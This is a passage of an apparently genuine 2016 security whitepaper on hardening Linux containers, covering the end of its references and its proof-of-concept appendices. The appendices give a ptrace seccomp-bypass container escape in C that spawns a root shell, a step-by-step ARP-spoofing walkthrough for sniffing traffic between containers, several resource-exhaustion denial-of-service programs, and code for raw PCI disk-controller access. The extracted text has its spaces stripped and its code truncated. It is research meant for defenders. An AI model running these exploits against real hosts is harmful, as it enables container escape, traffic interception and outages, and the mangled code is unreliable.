trust/globalassets/our-research/us/whitepapers/2016/april/ncc_group_understanding_hardening_linux_containers-10pdfNCCGroup|Page13Copyright2016NCCGroupReferences[1]https://lwn.
net/Articles/531114/.
[2]https://lwn.
net/Articles/524952/.
[3]http://man7.
org/linux/man-pages/man7/namespaces.
7.
html.
[4]https://deis.
com/blog/2015/isolation-linux-containers.
[5]http://lwn.
net/Articles/543273/.
[6]https://medium.
com/@ewindisch/linux-user-namespaces-might-not-be-secure-enough-a-k-a-subverting-posix-capabilities-f1c4ae19cad#.
tboeuds6z.
[7]https://linuxcontainers.
org/lxc/security/.
[8]https://blog.
docker.
com/2016/02/docker-engine-1-10-security/.
[9]https://access.
redhat.
com/documentation/en-US/Red_Hat_Enterprise_Linux/6/html/Resource_Management_Guide/ch01.
html.
[10]http://www.
slideshare.
net/jpetazzo/anatomy-of-a-container-namespaces-cgroups-some-filesystem-magic-linuxcon.
[11]https://github.
com/lxc/lxc/blob/master/config/templates/common.
conf.
in#L21.
[12]https://github.
com/opencontainers/runc/blob/master/libcontainer/SPEC.
md.
[13]http://man7.
org/linux/man-pages/man7/capabilities.
7.
html.
[14]https://github.
com/lxc/lxc/blob/master/config/templates/common.
conf.
in#L13.
[15]https://www.
kernel.
org/doc/Documentation/security/LSM.
txt.
[16]https://wiki.
ubuntu.
com/AppArmor.
[17]http://man7.
org/linux/man-pages/man5/lxc.
container.
conf.
5.
html.
[18]https://docs.
docker.
com/engine/security/security.
[19]https://www.
kernel.
org/doc/Documentation/prctl/seccomp_filter.
txt.
[20]https://github.
com/lxc/lxc/blob/master/config/templates/common.
seccomp.
[21]https://github.
com/jfrazelle/docker/blob/d34bbb66d5d5f2f07b8f0c1b63df5f058f20b436/daemon/execdriver/native/seccomp_default.
go.
[22]https://github.
com/lxc/lxc/blob/master/config/apparmor/abstractions/container-base.
[23]https://github.
com/docker/docker/blob/master/profiles/apparmor/template.
go.
[24]https://github.
com/lxc/lxc/blob/master/config/apparmor/lxc-generate-aa-rules.
py.
[25]https://github.
com/lxc/lxc/blob/master/config/apparmor/container-rules.
[26]http://www.
mpipks-dresden.
mpg.
de/~mueller/docs/suse10.
1/suselinux-manual_en/manual/sec.
udev.
kernel.
html.
[27]http://blog.
bofh.
it/debian/id_413.
[28]http://linux.
die.
net/man/8/modprobe.
[29]http://kaivanov.
blogspot.
com/2010/09/all-you-need-to-know-about-procsys.
html.
[30]http://man7.
org/linux/man-pages/man5/core.
5.
html).
NCCGroup|Page14Copyright2016NCCGroup[31]https://access.
redhat.
com/documentation/en-US/Red_Hat_Enterprise_Linux/4/html/Reference_Guide/s2-proc-kcore.
html.
[32]http://linux.
die.
net/man/4/kmem.
[33]https://www.
centos.
org/docs/5/html/5.
1/Deployment_Guide/s2-proc-sysrq-trigger.
html.
[34]https://www.
kernel.
org/doc/Documentation/sysrq.
txt.
[35]https://www.
kernel.
org/doc/Documentation/filesystems/debugfs.
txt.
[36]https://lwn.
net/Articles/429323/.
[37]https://lwn.
net/Articles/429321/.
[38]https://wiki.
archlinux.
org/index.
php/Unified_Extensible_Firmware_Interface.
[39]http://www.
phoronix.
com/scan.
phppage=news_item&px=UEFI-rm-root-directory.
[40]https://lwn.
net/Articles/153366/.
[41]http://wiki.
apparmor.
net/index.
php/Kernel_interfaces#securityfs_-_.
2Fsys.
2Fkernel.
2Fsecurity.
2Fapparmor.
[42]https://access.
redhat.
com/documentation/en-US/Red_Hat_Enterprise_Linux/6/html/Deployment_Guide/s2-proc-dir-sys.
html.
[43]http://man7.
org/linux/man-pages/man2/init_module.
2.
html.
[44]http://linux.
die.
net/man/2/finit_module.
[45]http://man7.
org/linux/man-pages/man2/delete_module.
2.
html.
[46]http://man7.
org/linux/man-pages/man2/kexec_load.
2.
html.
[47]http://man7.
org/linux/man-pages/man2/open_by_handle_at.
2.
html.
[48]http://www.
openwall.
com/lists/oss-security/2014/06/18/4.
[49]http://www.
openwall.
com/lists/oss-security/2014/06/24/16.
[50]https://medium.
com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3#.
5omzcmg6z.
[51]https://bugs.
launchpad.
net/ubuntu/+source/lxc/+bug/1511197.
[52]http://www.
tldp.
org/HOWTO/IO-Port-Programming-2.
html.
[53]http://linux.
die.
net/man/2/inb.
[54]https://lkml.
org/lkml/2015/6/13/191.
[55]https://www.
kernel.
org/doc/Documentation/prctl/seccomp_filter.
txt.
[56]https://gist.
github.
com/thejh/8346f47e359adecd1d53.
[57]https://docs.
docker.
com/engine/installation/linux/ubuntulinux/.
[58]https://help.
ubuntu.
com/lts/serverguide/lxc.
html.
[59]https://github.
com/docker/docker/pull/21263.
[60]https://bugs.
launchpad.
net/ubuntu/+source/lxc/+bug/1548497/comments/3.
[61]https://bugs.
launchpad.
net/ubuntu/+source/lxc/+bug/1548497.
[62]EmailcommunicationsbetweentheauthorandDiogoMónicafromDocker.
[63]https://lists.
linuxcontainers.
org/pipermail/lxc-users/2011-May/002025.
html.
[64]http://events.
linuxfoundation.
org/sites/events/files/slides/secure-lxc-networking.
pdf.
NCCGroup|Page15Copyright2016NCCGroup[65]https://www.
berrange.
com/posts/2011/10/03/guest-mac-spoofing-denial-of-service-and-preventing-it-with-libvirt-and-kvm/.
[66]https://nyantec.
com/en/2015/03/20/docker-networking-considered-harmful/.
[67]http://arxiv.
org/pdf/1501.
02967.
pdf.
[68]https://github.
com/docker/docker/issues/8951#issuecomment-61817262.
[69]http://people.
clarkson.
edu/~bullrl/classes/CS657/bullrl_CS657_project.
pdf.
[70]https://bugs.
launchpad.
net/neutron/+bug/1274034.
[71]https://review.
openstack.
org/#/c/196986/.
[72]http://lxr.
free-electrons.
com/source/kernel/cgroup_pids.
cv=4.
3.
[73]http://lists.
openwall.
net/linux-kernel/2015/04/12/7.
[74]https://linuxcontainers.
org/lxd/.
[75]https://www.
openstack.
org/software/.
[76]https://github.
com/kubernetes/kubernetes.
[77]https://clearlinux.
org/features/clear-containers.
[78]https://lwn.
net/Articles/644675/.
[79]http://lxr.
free-electrons.
com/source/fs/fhandle.
cv=3.
14#L178.
[80]http://lxr.
free-electrons.
com/source/kernel/capability.
cv=3.
14#L429.
[81]https://www.
vagrantup.
com/.
[82]https://atlas.
hashicorp.
com/ubuntu/boxes/trusty64.
[83]http://man7.
org/linux/man-pages/man2/timer_create.
2.
html.
.
[84]https://www.
vmware.
com/products/workstation.
NCCGroup|Page16Copyright2012NCCGroupAppendix:PrivilegedLXCEscapePoCThefollowingcodedemonstrateshowptrace(2)canbeusedtobypassseccomp.
Thisallowsusingopen_by_handle_at(2),whichallowsescapingfromaprivilegedcontainer.
WhilethistechniquecanstillbeusedtodisableseccompinsideunprivilegedLXCcontainers,asecuritycheckintheopen_by_handle_at(2)systemcallwillfail,duetotheuseofthe`capable()`macro[79],whichperformscapabilitychecksagainsttherootusernamespace[80].
ThisentireseccompbypassvectorisblockedbyDockerbydisallowingptrace(2)insidecontainers:/**@authorTimNewsham*useptracetobypassseccompruleagainstopen_handle_at*anduseopen_handle_attogetahandleontheREALrootdir*andthenchroottoit.
Thisescapesprivilegedlxccontainer.
*gcc-g-Wallsecopenchroot.
c-osecopenchroot*.
/secopenchroot/tmp"0200000000000000"**assumingthattherealroothasfilehandle"0200000000000000"*/#include#include#include#include#include#include#include#include#include#include#include#include#define_GNU_SOURCE#define__USE_GNU#include#include#includeintgetDat(char*p,unsignedchar*buf){char*ep;intn,val;n=0;while(*p){NCCGroup|Page17Copyright2016NCCGroupwhile(isspace(*p))p++;val=strtoul(p,&ep,16);if(ep!
=p+2)return-1;p=ep;buf[n++]=val;while(isspace(*p))p++;}returnn;}voidattack(char*fn,char*dat){unsignedcharbuf[16+MAX_HANDLE_SZ];structfile_handle*fp=(structfile_handle*)buf;intn,mfd,fd;fp->handle_type=1;n=getDat(dat,fp->f_handle);if(n==-1){printf("baddata!
\n");exit(1);}fp->handle_bytes=n;mfd=open(fn,0);if(mfd==-1){perror(fn);exit(1);}//fd=open_by_handle_at(mfd,fp,0);fd=syscall(SYS_getpid,SYS_open_by_handle_at,mfd,fp,0);if(fd==-1){perror("open_by_handle");exit(1);}printf("opened%d\n",fd);fchdir(fd);chroot(".
");system("sh-i");}/*steptostartorendofnextsystemcall*/intsysStep(intpid){intst;NCCGroup|Page18Copyright2016NCCGroupif(ptrace(PTRACE_SYSCALL,pid,NULL,NULL)==-1){perror("ptracesyscall");return-1;}if(waitpid(pid,&st,__WALL)==-1){perror("waitpid");return-1;}//printf("status%x\n",st);if(!
(WIFSTOPPED(st)&&WSTOPSIG(st)==SIGTRAP))return-1;return0;}voiddumpregs(intpid){structuser_regs_structregs;if(ptrace(PTRACE_GETREGS,pid,NULL,®s)==-1)return;printf("rip%016llx",regs.
rip);printf("rsp%016llx",regs.
rsp);printf("efl%016llx\n",regs.
eflags);printf("rax%016llxorig%016llx",regs.
rax,regs.
orig_rax);printf("rdi%016llx\n",regs.
rdi);printf("rsi%016llx",regs.
rsi);printf("rdx%016llx",regs.
rdx);printf("rcx%016llx\n",regs.
rcx);printf("r8%016llx",regs.
r8);printf("r9%016llx",regs.
r9);printf("r10%016llx\n",regs.
r10);printf("\n");}intmain(intargc,char**argv){structuser_regs_structregs;intpid;if(argc!
=3){printf("badusage\n");exit(1);}switch((pid=fork())){case-1:perror("fork");exit(1);NCCGroup|Page19Copyright2016NCCGroupcase0:/*child:gettracedanddoourattack*/ptrace(PTRACE_TRACEME,0,NULL,NULL);kill(getpid(),SIGSTOP);attack(argv[1],argv[2]);exit(0);}/*parent:translategetpidcallsintoothersyscalls.
max4args.
*/waitpid(pid,0,0);/*waitforattach*/while(sysStep(pid)!
=-1){/*potentiallytamperwithsyscall*/if(ptrace(PTRACE_GETREGS,pid,NULL,®s)==-1){perror("ptracegetregs");break;}/**note:wewontgetasyscall-enter-stopforany*seccompfilteredsyscalls,justthesyscall-exit-stop.
*/if(regs.
rax!
=-ENOSYS)/*notasyscall-enter-stop!
*/continue;if(regs.
orig_rax==SYS_getpid){regs.
orig_rax=regs.
rdi;regs.
rdi=regs.
rsi;regs.
rsi=regs.
rdx;regs.
rdx=regs.
r10;regs.
r10=regs.
r8;regs.
r8=regs.
r9;regs.
r9=0;printf("syscallX%llu,beforetampering\n",regs.
orig_rax);dumpregs(pid);ptrace(PTRACE_SETREGS,pid,NULL,®s);printf("aftertampering\n");dumpregs(pid);}//printf("before\n");dumpregs(pid);if(sysStep(pid)==-1)/*gotosyscallexit*/break;//printf("after\n");dumpregs(pid);}return0}NCCGroup|Page20Copyright2016NCCGroupAppendix:Cross-ContainerARPSpoofingWalkthroughThefollowingwasperformedonadefaultLXCinstallation[58],andreportedtoLXCandDockerwithafullwrite-upandreproduction,whichwasmadepublicbytheLXCteam[61].
ThisreproductionisforanLXCsystem,butitcaneasilybeadaptedtoaDockersysteminstead.
#first,wesetupaUbuntuVMw/vagrantvagrantinitubuntu/trusty64vagrantupvagrantssh#Now,insidethenewUbuntuVM:apt-getupdateapt-getinstalllxc#setuptwounprivilegedLXCcontainers#(fromhttps://help.
ubuntu.
com/lts/serverguide/lxc.
html)mkdir-p~/.
config/lxcecho"lxc.
id_map=u010000065536">~/.
config/lxc/default.
confecho"lxc.
id_map=g010000065536">>~/.
config/lxc/default.
confecho"lxc.
network.
type=veth">>~/.
config/lxc/default.
confecho"lxc.
network.
link=lxcbr0">>~/.
config/lxc/default.
confecho"$USERvethlxcbr02"|sudotee-a/etc/lxc/lxc-usernetlxc-create-tdownload-na---dubuntu-rtrusty-aamd64lxc-create-tdownload-nb---dubuntu-rtrusty-aamd64#fixcgroupissues(fromhttps://github.
com/lxc/lxc/issues/181)forcinhugetlbcpusetcpucpuacctmemorydevicesfreezerblkioperf_event;dosudodbus-send--print-reply--address=unix:path=/sys/fs/cgroup/cgmanager/sock\--type=method_call/org/linuxcontainers/cgmanagerorg.
linuxcontainers.
cgmanager0_0.
Create\string:$cstring:$USERsudodbus-send--print-reply--address=unix:path=/sys/fs/cgroup/cgmanager/sock\--type=method_call/org/linuxcontainers/cgmanagerorg.
linuxcontainers.
cgmanager0_0.
Chown\string:$cstring:$USERint32:$(id-u)int32:$(id-g)dbus-send--print-reply--address=unix:path=/sys/fs/cgroup/cgmanager/sock\--type=method_call/org/linuxcontainers/cgmanagerorg.
linuxcontainers.
cgmanager0_0.
MovePid\string:$cstring:$USERint32:$$done#startthecontainerslxc-start-na-dNCCGroup|Page21Copyright2016NCCGrouplxc-start-nb–d#opentwonewterminalwindows#inone:attachtocontainerAlxc-attach-na#inanother:attachtocontainerBlxc-attach-nb#fromnowon,allcommandswillhavethefullcommandprompttomakeitclear#wheretheyarebeingrun#lookattheARPtablesonthehost:root@vagrant-ubuntu-trusty-64:~#arp-a(10.
0.
2.
2)at52:54:00:12:35:02[ether]oneth0(10.
0.
3.
159)ate2:33:5d:33:cf:07[ether]onlxcbr0(10.
0.
3.
246)ate6:ad:42:7a:f1:54[ether]onlxcbr0(10.
0.
2.
3)at52:54:00:12:35:03[ether]oneth0#inthiscase,10.
0.
3.
159iscontainerB'seth0,and10.
0.
3.
246iscontainerA'seth0#sincethetwocontainersareonthesamesubnet,itmayappearthattheycan#sniffeachother'straffic.
so.
.
.
#aquickdemonstrationthatyoucannotnormallysnifftrafficonthewire#justbyvirtueofbeingonthesamesubnet:#incontainerAroot@a:/#tcpdump-iany-vv-ndsthost10.
0.
3.
159#incontainerBroot@b:/#nc-lv8888#onthehost(typesomethinginthencsession,andnotenotraffic#isoutputincontainerA)vagrant@vagrant-ubuntu-trusty-64:~$nc10.
0.
3.
838888#now,wewilldemonstratetheabilitytosnifftrafficwithARPspoofing#incontainerA:#installdsniffapt-getupdateapt-getinstalldsniff#ARPspoofthehost:arpspoof-t10.
0.
3.
110.
0.
3.
159&>/dev/nulllookattheARPtablesonthehostandnotethatboth10.
0.
3.
159and10.
0.
3.
246#bothnowpointattheMACaddressforcontainerA:root@vagrant-ubuntu-trusty-64:~#arp-a(10.
0.
2.
2)at52:54:00:12:35:02[ether]oneth0(10.
0.
3.
159)ate6:ad:42:7a:f1:54[ether]onlxcbr0(10.
0.
3.
246)ate6:ad:42:7a:f1:54[ether]onlxcbr0NCCGroup|Page22Copyright2016NCCGroup(10.
0.
2.
3)at52:54:00:12:35:03[ether]oneth0#notethatcontainerBcannolongeraccesstheinternet#(thefollowingcommandwillhang):root@b:/#apt-getinstallcurl#now,fromcontainerA,wecanARPspoofcontainerBaswell:root@a:/#arpspoof-t10.
0.
3.
15910.
0.
3.
1&>/dev/nulllookatthearptablesincontainerBandnote#10.
0.
3.
1nowpointstocontainerA:root@b:/#arp-aa(10.
0.
3.
246)ate6:ad:42:7a:f1:54[ether]oneth0(10.
0.
3.
1)ate6:ad:42:7a:f1:54[ether]oneth0#Finally,wecantrytosendsometrafficfromthehosttocontainerB,#andsniffitfromcontainerA#inBroot@b:/#nc-lv8888#inA:root@a:/#apt-getinstalltcpdumproot@a:/#tcpdump-iany-vv-ndsthost10.
0.
3.
159#onthehostroot@vagrant-ubuntu-trusty-64:~#nc10.
0.
3.
1598888#typesomethingintheabovencsession,andobservetheconnection#fromthehost-->B,sniffingfromA:root@a:/#tcpdump-iany-vv-ndsthost10.
0.
3.
159tcpdump:listeningonany,link-typeLINUX_SLL(Linuxcooked),capturesize65535bytes02:05:05.
653355IP(tos0x0,ttl64,id49639,offset0,flags[DF],protoTCP(6),length60)10.
0.
3.
1.
43655>10.
0.
3.
159.
8888:Flags[S],cksum0x1ace(incorrect->0x4bff),seq2684314036,win29200,options[mss1460,sackOK,TSval761939ecr0,nop,wscale6],length0NCCGroup|Page23Copyright2016NCCGroupAppendix:DenialofServiceProofs-of-ConceptCodeAllofthefollowingwasperformedinsidedefaultLXCandDockercontainers,usingadefaultVagrant[81]UbuntuTrusty64VM[82].
ThelatestversionsofLXC(1.
0.
8)[58]andDocker(1.
10.
2)[57]available(atthetimeoftesting)onTrusty64wereused,andwereinstalledandconfiguredaccordingtotheirguides[57][58].
(Pertheguide,Dockerwasnotusingusernamespacesorseccompinthistesting.
)POSIXMessageQueuesToexhaustallavailablememoryforPOSIXmessagequeues,thefollowingCprogramcanbeused.
Itisbuiltwith`gccmq.
c-lrt`,andthenrunwith`.
/a.
out`.
Runthisprograminonecontaineruntilithasusedallavailableresources(whichwillleadittoexitwith:`mq_open():Toomanyopenfiles`).
Then,insideasecondcontainer,runthesameprogram,andobservethatitimmediatelyerrorsoutwithoutsuccessfullycreatingonemessagequeue.
/*@authorjhertz*basedoffcodefoundat:*https://users.
pja.
edu.
pl/~jms/qnx/help/watcom/clibref/mq_overview.
html*/#include#include#include#includevoidmain(){mqd_tmqdes;//Messagequeuedescriptorsunsignedintprio;//Prioritycharbiggest[8192];//basedonaulimit–qof819200inti;constchar*ptr=(constchar*)biggest;for(i=0;;i++){sprintf(biggest,"/%d",i);printf("goingtoopenmq:%s\n",biggest);mqdes=mq_open(biggest,O_RDWR|O_CREAT,O_RDWR,NULL);if(mqdes==-1){perror("mq_open()");return;}for(prio=0;prio#include#include#include#include#includeintmain(void){pthread_tthread;sigset_tset;ints;sigfillset(&set);//BLOCKallsignalsprintf("goingtoblockallsignals\n");s=pthread_sigmask(SIG_BLOCK,&set,NULL);if(s!
=0){printf("couldn'tblockallsignals\n");return-1;}printf("allsignalsblocked,goingtospinloop\n");while(1){;}}Theabovecanbebuiltwith`gcc-lpthreadsignal.
c-osignal`andthenrunas`.
/signal`.
Oncerunning,themaximumnumberofsignalscanbequeuedusingasimplebashone-liner:`'foriin{1.
.
3752};dokill-64;done'`where``isthepidofthe`signal`program,and3752wasthemaximumnumberofpendingsignalsallowedbyulimit.
NCCGroup|Page25Copyright2016NCCGroupUponsuccess,thenumberofsignalsqueuedupcanbeviewed(asanyprocessrunningasrootinsideanycontainer)with`'cat/proc/self/status|grepSigQ'`.
Thiscanbeverifiedinaseparatecontainer.
Toseetheeffectsofthis,wecanobserveacallto`timer_create()`failing(duetoexcessivependingsignals)usingthetimer_create()examplefromthemanpages[83].
Builditwith`gcctimer.
c–lrt`,andrunitwith`.
/a.
out11`toobservethetimer_create()callfailing.
MaxProcessesThisisalwaysoneofmyfavoritedenial-of-serviceattacks,becauseofhowsimplethe"exploit"isversusjusthowlargeanimpactitcanhave.
Evenwithouttrivialforkbombs,asequential-forkerof:foriin{1.
.
3752};dosleepinfinity&doneinanLXCcontainerwasenoughtogetmyVagrantVMtocloseallmySSHsessions,andneededtobevagranthalt--forced.
ThisdidnotdestabilizethehostVMonDocker.
MaxFilesTouseupallavailablefiledescriptors(FDs),thefollowingshortCprogramcanbeused:/*filedescriptoreater**meanttobeusedinparallel**@authorjhertz*/#include#include#include#include#includeintmain(void){intmy_pid=getpid();charbuf[128];inti=0;for(i=0;;i++){sprintf(buf,"/tmp/%d_%d",my_pid,i);intfd=open(buf,O_CREAT);if(-1==fd){printf("gottomaxfd#%d\n",i);break;}}printf("stalling\n");for(;;);}Itcanbecompiledwith`gccfile.
c–ofile`andrunwith`.
/file`.
OnDocker,thiscreatesasimpleandeffectiveDoSagainstotherDockercontainers.
OnLXC,theulimitspercontainerweresetlower,NCCGroup|Page26Copyright2016NCCGroupsoinordertoexploitthis,itneededtobeusedinparallel:foriin{1.
.
100};do.
/file&donewasenoughtocauseadenialofservicetootherLXCcontainers.
Exploitingtheglobalfiledescriptorlimitfollowsalongthesamelinesasthepreviousexploit,andispossibleevenwhencontainersdonotshareUIDmaps.
InsuchacasewhereUIDmapsarenon-shared,andcontainershaveamax-FDulimitplacedoneachoftheirusers,theycanattempttoexhaustFDsbyrunningtheabovecodeaseachuserintheirusernamespace.
NCCGroup|Page27Copyright2016NCCGroupDiskSpaceOnLXC,thisisassimpleasfallocate–L18Gbig_filewhere18Gisbigenoughtofilluptheharddisk.
Dockerdoesn'tallowfallocate,soslightlymorecreativityisneeded.
ddprovedineffectivewhentryingthisattack,andsothethefollowingscriptwaswrittenasaPoC:#!
/usr/bin/envpython#@authorjhertz#quickanddirtyscripttomakeabigfile(~18gigs)#thisisfarfromthemostefficientwaytodothiswithopen("big_file","w")asf:foriinxrange(1,1024*18):f.
write("B"*1024*1024)f.
flush()f.
close()NCCGroup|Page28Copyright2016NCCGroupAppendix:/proc/bus/pciPoCThisproofofconceptismeanttodemonstratetheabilitytocircumventanLXCprivilegedcontainer's"securityboundary"bycommunicatingwithunderlyinghardwaredirectly.
EnvironmentThetestenvironmentforthisonewasaVMWareworkstation[84]VMrunningUbuntutrusty64.
TheprimarydiskwasaSCSIdisc,butasecondarytarget1GBSATAdiskwasadded,withnospecialsettings(writecachingwasenabledbydefault).
Communicationispossibleregardlessofthemountstateofthedrive.
AdefaultLXCprivilegedenvironmentwascreatedusingtheinstructionsat[58].
AstherootuserintheLxCcontainer,lspci–vvwasusedtogettheinformationaboutthetargetAHCIdevice:02:05.
0SATAcontroller:VMwareDevice07e0(prog-if01[AHCI1.
0])Subsystem:VMwareDevice07e0PhysicalSlot:37Control:I/O-Mem+BusMaster+SpecCycle-MemWINV-VGASnoop-ParErr-Stepping-SERR-FastB2B-DisINTx+Status:Cap+66MHz+UDF-FastB2B-ParErr-DEVSEL=fast>TAbort-SERR-ports_impl:0x3fffffffport0commandlistbaseaddress:0x0FISbaseaddress:0x14c29000interruptstatus:0x0interruptenable:0x7840007fPORT_IRQ_D2H_REG_FISPORT_IRQ_PIOS_FISPORT_IRQ_DMAS_FISPORT_IRQ_SDB_FISPORT_IRQ_UNK_FISPORT_IRQ_SG_DONEPORT_IRQ_CONNECTPORT_IRQ_PHYRDYPORT_IRQ_IF_ERRPORT_IRQ_HBUS_DATA_ERRPORT_IRQ_HBUS_ERRPORT_IRQ_TF_ERRcommandandstatus:0x44016PORT_CMD_SPIN_UPPORT_CMD_POWER_ONPORT_CMD_FIS_RXPORT_CMD_FIS_ONsignature:0x101(SATAdrive)tfd:0x441status:0x123errors:0x0active:0x0control:0x320interruptstatusbefore:0x0startbitbefore:0interruptstatusafter:0x2PORT_IRQ_PIOS_FISWaitingforcommandcompletionSeemstohavecompleted.
.
.
GotresponsedatainDMAbuffer:0x7f5a27873000:7a42ab0800000f00000000003f000000zB.
NCCGroup|Page30Copyright2016NCCGroup0x7f5a27873010:00000000303030303030303030303030.
.
.
.
0000000000000x7f5a27873020:3030303030303130000040000000303000000010.
.
.
.
.
.
000x7f5a27873030:3030303031304d566177657256207269000010MVawerV.
ri0x7f5a27873040:75746c61532054412041614864724420utlaS.
TA.
AaHdrD.
0x7f5a27873050:6972657620202020202020202020ff80irev.
0x7f5a27873060:0000000f0140000200000700ab080f000x7f5a27873070:3f003bff1f00ff0100002000000007000x7f5a27873080:03007800780078007800000000000000.
.
x.
x.
x.
x.
.
.
.
.
.
.
0x7f5a27873090:0000000000001f0006010000000000000x7f5a278730a0:7e001800084008740041084080340041.
.
.
.
.
.
.
t.
A.
.
.
4.
A[SNIP]ThehexdumpoutputshowstheATAIDENTIFYcommandresponsesentbackfromthecontroller.
Therearesomeassumptionsthecodemakes.
ItassumesthedriveitisgoingtotalktoisthefirstdeviceitfindsintheAHCIportlistthatisactuallyactive.
Alsoitdoesn'tcleanlyrecovereverythingaftergettingtheresponse,sothestateofthemappedregistersiswrongandthekernelwon'tbeabletomountthedeviceafterwardsoranything.
ExplanationofPoCWhilereadingtheattachedcodeisinstructive,hereisanoverviewofthemethodologyused:MapthecontrolregionoftheAHCIdeviceintomemorythroughthe/proc/bus/pci/interfaceusingopen(),mmap(),andioctl().
Allocateseveralbuffers,anddeterminetheirlogicaladdressusing/proc/self/pagemap.
Disableinterruptsforthedevice.
Findtheportthedriveisattachedto.
SettheFIS,Command,andCommandListpointersonthedevicetothepreviouslyallocatedbuffers.
CreateaH2DFIS(totellthedrivetoidentifyitself),acommandtowraptheFIS(tellingthedrivetouseaDMAbufferwehaveallocated),andacommandliststructurecontainingthecommand.
Copyallofthesetothepreviouslyallocatedbuffers,whichthedevicealsonowhaspointersto.
Flipthestartbitonthedevicetocauseitprocesscommandsfromthecommandlist.
Sleepforasecond,thenspinloopuntilthedrivehasprocessedtthecommand.
Thedrivehasnowexecutedourcommand(ATA_CMD_ID_ATA,whichisthedriveidentificationcommand),andwrittentheresulttoabufferweallocated.
Printitout,andattempt(poorly)torestorethedrive'sstate.
NCCGroup|Page31Copyright2016NCCGroupTheCode/**LxCPCIDeviceAccessThrough/proc/PoC*SamplecodetomapinPCImemoryforaspecifiedAHCIdeviceand*tellthedevicetoidentifyitself.
*"vulnerability"discoveredbyjhertz*PoCwrittenbyaaronadams*/#define_LARGEFILE64_SOURCE#define_GNU_SOURCE#include#include#include#include#include#include#include#include#include#include#include#include#include#include#includeexternchar*optarg;externintoptind,opterr,optopt;#definePAGE_SIZE4096#definePMAP"/proc/%d/pagemap"intopen_pmap(void){intfd;intrc;char*pmap;rc=asprintf(&pmap,PMAP,getpid());if(-1==rc){perror("asprintf");exit(EXIT_FAILURE);}fd=open(pmap,O_RDONLY);NCCGroup|Page32Copyright2016NCCGroupif(-1==fd){perror("open");exit(EXIT_FAILURE);}free(pmap);returnfd;}#definePM_ENTRY_BYTESsizeof(pagemap_entry_t)#definePM_STATUS_BITS3#definePM_STATUS_OFFSET(64-PM_STATUS_BITS)#definePM_STATUS_MASK(((1LL0;j--){if(i==0){break;}if(j==7){n=sprintf(p,"");p+=n;}c=*(addr-j)&0xff;if(cflagsbits*/#defineAHCI_HFLAGS(flags).
private_data=(void*)(flags)AHCI_HFLAG_NO_NCQ=(1flagsbits*/ICH_MAP=0x90,/*ICHMAPregister*//*emconstants*/EM_MAX_SLOTS=8,EM_MAX_RETRY=5,/*em_ctlbits*/EM_CTL_RST=(1\n""-bBusID\n""-dDeviceID\n""-fFunctionID\n""-aBAR(physaddr)\n""-pNumberofpagestomap\n""-hThisusageinfo\n""Ex:%s-b02-d05-f0-a0xfd5ee000-p1\n",p,p);NCCGroup|Page42Copyright2016NCCGroup}/*Thisismeanttomimictheoutputfromdmesg|grepAHCI.
Ifthereisa*matchthenweknowatleastwehavetherightmemlocation*/voidprint_ahci_info(ahci_host_t*p){uint32_tspeed;char*speed_s;speed=(p->cap>>20)&0xf;if(speed==1)speed_s="1.
5";elseif(speed==2)speed_s="3";elseif(speed==3)speed_s="6";elsespeed_s="";printf("AHCI%02x%02x.
%02x%02x%uslots%dports%sGbps0x%ximpl\n",(p->version>>24)&0xff,(p->version>>16)&0xff,(p->version>>8)&0xff,(p->version>>0)&0xff,((p->cap>>8)&0x1f)+1,(p->cap&0x1f)+1,speed_s,p->ports_impl);}//Thisdoesn'tactuallyworkinpractice.
.
.
voidreset_ahci_controller(ahci_host_t*p){uint32_tctl;ctl=p->ctl;if((ctl&HOST_RESET)==0){printf("resetting.
.
.
\n");p->ctl=(ctl|HOST_RESET);ctl=p->ctl;}sleep(2);ctl=p->ctl;if(ctl&HOST_RESET){NCCGroup|Page43Copyright2016NCCGroupprintf("Successfullyreset!
\n");}else{printf("Didn'treset\n");}}void*ahci_port_base(char*p){returnp+PORT_OFFSET;}hba_port_t*ahci_port_entry(char*p,intport_num){return(hba_port_t*)((p+PORT_OFFSET)+(port_num*PORT_SIZE));}voidprint_interrupt_bits(intie){if(ie&PORT_IRQ_D2H_REG_FIS)printf("\tPORT_IRQ_D2H_REG_FIS\n");if(ie&PORT_IRQ_PIOS_FIS)printf("\tPORT_IRQ_PIOS_FIS\n");if(ie&PORT_IRQ_DMAS_FIS)printf("\tPORT_IRQ_DMAS_FIS\n");if(ie&PORT_IRQ_SDB_FIS)printf("\tPORT_IRQ_SDB_FIS\n");if(ie&PORT_IRQ_UNK_FIS)printf("\tPORT_IRQ_UNK_FIS\n");if(ie&PORT_IRQ_SG_DONE)printf("\tPORT_IRQ_SG_DONE\n");if(ie&PORT_IRQ_CONNECT)printf("\tPORT_IRQ_CONNECT\n");if(ie&PORT_IRQ_DEV_ILCK)printf("\tPORT_IRQ_DEV_ILCK\n");if(ie&PORT_IRQ_PHYRDY)printf("\tPORT_IRQ_PHYRDY\n");if(ie&PORT_IRQ_BAD_PMP)printf("\tPORT_IRQ_BAD_PMP\n");if(ie&PORT_IRQ_OVERFLOW)printf("\tPORT_IRQ_OVERFLOW\n");if(ie&PORT_IRQ_IF_NONFATAL)printf("\tPORT_IRQ_IF_NONFATAL\n");if(ie&PORT_IRQ_IF_ERR)NCCGroup|Page44Copyright2016NCCGroupprintf("\tPORT_IRQ_IF_ERR\n");if(ie&PORT_IRQ_HBUS_DATA_ERR)printf("\tPORT_IRQ_HBUS_DATA_ERR\n");if(ie&PORT_IRQ_HBUS_ERR)printf("\tPORT_IRQ_HBUS_ERR\n");if(ie&PORT_IRQ_TF_ERR)printf("\tPORT_IRQ_TF_ERR\n");if(ie&PORT_IRQ_COLD_PRES)printf("\tPORT_IRQ_COLD_PRES\n");}voidprint_command_bits(intcmd){if(cmd&PORT_CMD_START)printf("\tPORT_CMD_START\n");if(cmd&PORT_CMD_SPIN_UP)printf("\tPORT_CMD_SPIN_UP\n");if(cmd&PORT_CMD_POWER_ON)printf("\tPORT_CMD_POWER_ON\n");if(cmd&PORT_CMD_CLO)printf("\tPORT_CMD_CLO\n");if(cmd&PORT_CMD_FIS_RX)printf("\tPORT_CMD_FIS_RX\n");if(cmd&PORT_CMD_FIS_ON)printf("\tPORT_CMD_FIS_ON\n");if(cmd&PORT_CMD_LIST_ON)printf("\tPORT_CMD_LIST_ON\n");if(cmd&PORT_CMD_PMP)printf("\tPORT_CMD_PMP\n");if(cmd&PORT_CMD_FBSCP)printf("\tPORT_CMD_FBSCP\n");if(cmd&PORT_CMD_ATAPI)printf("\tPORT_CMD_ATAPI\n");if(cmd&PORT_CMD_ALPE)printf("\tPORT_CMD_ALPE\n");if(c